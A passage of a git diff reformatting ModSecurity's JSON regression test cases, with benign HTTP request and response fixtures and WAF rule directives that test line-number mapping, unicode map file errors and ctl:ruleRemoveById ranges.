+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -122,22 +135,28 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { - "http_code": 200, - "debug_log": "Target value: \"1\"" + "debug_log": "Target value: \"1\"", + "http_code": 200 }, "rules": [ "SecRuleEngine On", @@ -150,7 +169,7 @@ "version_min": 209000, "version_max": -1, "title": "Invalid actions break CRS 3.1 on rule 912160 - 4", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1830", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1830", "client": { "ip": "200.249.12.31", "port": 2313 @@ -163,7 +182,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -171,22 +190,28 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { - "http_code": 200, - "debug_log": "GLOBAL:alerted_970018_iisDefLoc with value: 1" + "debug_log": "GLOBAL:alerted_970018_iisDefLoc with value: 1", + "http_code": 200 }, "rules": [ "SecRuleEngine On", @@ -195,6 +220,3 @@ ] } ] - - - diff --git a/test/test-cases/regression/issue-1844.json b/test/test-cases/regression/issue-1844.json index 6ccb1f5e8a..e93b71f17b 100644 --- a/test/test-cases/regression/issue-1844.json +++ b/test/test-cases/regression/issue-1844.json @@ -1,279 +1,290 @@ [ { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (1/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... correct line number in file (1/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "26", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"29\"" + "expected": { + "error_log": "line \"29\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test1\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (2/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... correct line number in file (2/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"55\"" + "expected": { + "error_log": "line \"55\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test2\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (3/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... correct line number in file (3/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"84\"" + "expected": { + "error_log": "line \"84\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test3\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (4/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... correct line number in file (4/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test4" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"116\"" + "expected": { + "error_log": "line \"116\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test3\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (5/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... correct line number in file (5/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test5" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"174\"" + "expected": { + "error_log": "line \"174\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test3\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (6/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... correct line number in file (6/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test5" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"174\"" + "expected": { + "error_log": "line \"174\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test3\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/not-so-big-file.conf" ] } ] - diff --git a/test/test-cases/regression/issue-1850.json b/test/test-cases/regression/issue-1850.json index 75ac2bc5f6..d32f3d1a68 100644 --- a/test/test-cases/regression/issue-1850.json +++ b/test/test-cases/regression/issue-1850.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Override the default status code if not suitable to redirect action", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1850", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1850", "client": { "ip": "200.249.12.31", "port": 2313 @@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -25,18 +25,24 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "http_code": 302 diff --git a/test/test-cases/regression/issue-1941.json b/test/test-cases/regression/issue-1941.json index 0410ddad84..9a2ebfc88f 100644 --- a/test/test-cases/regression/issue-1941.json +++ b/test/test-cases/regression/issue-1941.json @@ -4,8 +4,35 @@ "version_min": 209000, "version_max": -1, "title": "Failed to load locate the unicode map file from: ... 1/n", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1941", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1941", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { + "http_code": 200, "parser_error": "Failed to locate the unicode map file from: does-not-exist-unicode.mapping" }, "rules": [ @@ -18,9 +45,36 @@ "version_min": 209000, "version_max": -1, "title": "Failed to load locate the unicode map file from: ... 2/n", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1941", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1941", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "parser_error": "Failed to locate the unicode map file from: um dois tres does-not-exist-unicode.mapping" + "http_code": 200, + "parser_error": "Failed to locate the unicode map file from: um dois tres does-not-exist-unicode.mapping" }, "rules": [ "SecRuleEngine On", @@ -32,9 +86,36 @@ "version_min": 209000, "version_max": -1, "title": "Failed to load locate the unicode map file from: ... 3/n", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1941", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1941", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "parser_error": "Invalid input: SecUnicodeMapFile does-not-exist-unicode.mapping eita" + "http_code": 200, + "parser_error": "Invalid input: SecUnicodeMapFile does-not-exist-unicode.mapping eita" }, "rules": [ "SecRuleEngine On", @@ -57,8 +138,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -66,27 +147,30 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2&pparam=дор", + "uri": "/test.pl?param1= test ¶m2=test2&pparam=дор", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { @@ -115,8 +199,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -124,27 +208,30 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2&pparam=дор", + "uri": "/test.pl?param1= test ¶m2=test2&pparam=дор", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { diff --git a/test/test-cases/regression/issue-1943.json b/test/test-cases/regression/issue-1943.json index 7dd688d556..9a906dd507 100644 --- a/test/test-cases/regression/issue-1943.json +++ b/test/test-cases/regression/issue-1943.json @@ -15,8 +15,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -24,27 +24,30 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2&pparam=дор", + "uri": "/test.pl?param1= test ¶m2=test2&pparam=дор", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { @@ -72,8 +75,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -81,31 +84,33 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2&pparam=дор", + "uri": "/test.pl?param1= test ¶m2=test2&pparam=дор", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "debug_log": "", "http_code": 200 }, "rules": [ diff --git a/test/test-cases/regression/issue-1956.json b/test/test-cases/regression/issue-1956.json index ead45da2a0..587f822a6d 100644 --- a/test/test-cases/regression/issue-1956.json +++ b/test/test-cases/regression/issue-1956.json @@ -1,190 +1,215 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 1", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 1", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { - "Host": "www.google.com" + "Host": "www.google.com", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule id: 913104 was skipped due to a ruleRemoveById", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913103-913105\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913104,phase:request,pass,nolog,t:none,msg:'whee'\"" ] }, { - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 2", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 2", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { - "Host": "www.google.com" + "Host": "www.google.com", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule id: 913104 was skipped due to a ruleRemoveById", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913104\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913104,phase:request,pass,nolog,t:none,msg:'whee'\"" ] }, { - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 3", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 3", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { - "Host": "www.google.com" + "Host": "www.google.com", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule id: 913103 was skipped due to a ruleRemoveById", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913103-913105\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913103,phase:request,pass,nolog,t:none,msg:'whee'\"" ] }, { - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 4", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 4", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { - "Host": "www.google.com" + "Host": "www.google.com", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule id: 913105 was skipped due to a ruleRemoveById", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913103-913105\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913105,phase:request,pass,nolog,t:none,msg:'whee'\"" ] }, { - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 5", - 